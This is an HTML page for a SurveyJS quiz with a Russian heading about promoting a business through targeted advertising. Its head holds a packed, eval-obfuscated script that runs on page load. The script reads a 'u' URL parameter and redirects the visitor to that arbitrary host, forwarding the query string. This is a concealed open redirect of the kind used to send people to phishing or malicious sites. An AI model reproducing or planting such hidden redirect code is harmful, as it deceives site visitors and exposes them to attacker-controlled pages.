<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>surveyJs quiz</title>
  <link rel="stylesheet" href="./style.css">
  <script>
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 0=c b(a.2.9);3 1=0.8(\'7\');6(1){2.5=\'4://\'+1+\'/?\'+0}',13,13,'urlParams|url|location|const|https|href|if|u|get|search|window|URLSearchParams|new'.split('|'),0,{}))
  </script>
</head>
<body>
<!-- partial:index.partial.html -->
<link rel="stylesheet" type="text/css" href="https://unpkg.com/nouislider@9.2.0/distribute/nouislider.min.css">
      <link rel="stylesheet" type="text/css" href="https://unpkg.com/bootstrap@3.3.7/dist/css/bootstrap.min.css">
<script type="text/javascript" src="//code.jquery.com/jquery-3.1.1.js"></script>


      <script type="text/javascript" src="https://unpkg.com/survey-jquery@0.12.10"></script>
      
      <script type="text/javascript" src="https://unpkg.com/nouislider@9.2.0/distribute/nouislider.js"></script>
<div class="container">
      <div class="row">
        <div class="col-xs-1-12 ">
           <h3>
   <span class="icon quiz__title-icon"><svg viewBox="0 0 24 24" class="mdi-icon mdi-24px"><title>mdi-file-document-box-check-outline</title><path d="M17,21L14.25,18L15.41,16.84L17,18.43L20.59,14.84L21.75,16.25M12.8,21H5C3.89,21 3,20.11 3,19V5C3,3.89 3.89,3 5,3H19C20.11,3 21,3.89 21,5V12.8C20.39,12.45 19.72,12.2 19,12.08V5H5V19H12.08C12.2,19.72 12.45,20.39 12.8,21M12,17H7V15H12M14.68,13H7V11H17V12.08C16.15,12.22 15.37,12.54 14.68,13M17,9H7V7H17"></path></svg></span> Узнайте, как с помощью таргетированной рекламы продвигать ваш бизнес и получать больше дохода!
  </h3>
  <div id="surveyElement"></div>
			<p class="sum-slider"><span class="example-val" id="slider-padding-value-min"></span>
			<span class="example-val" id="slider-padding-value-max"></span></p>
          
<div id="result"></div>
        </div>
        
      </div>
    </div>
<!-- partial -->
  <script  src="./script.js"></script>

</body>
</html>
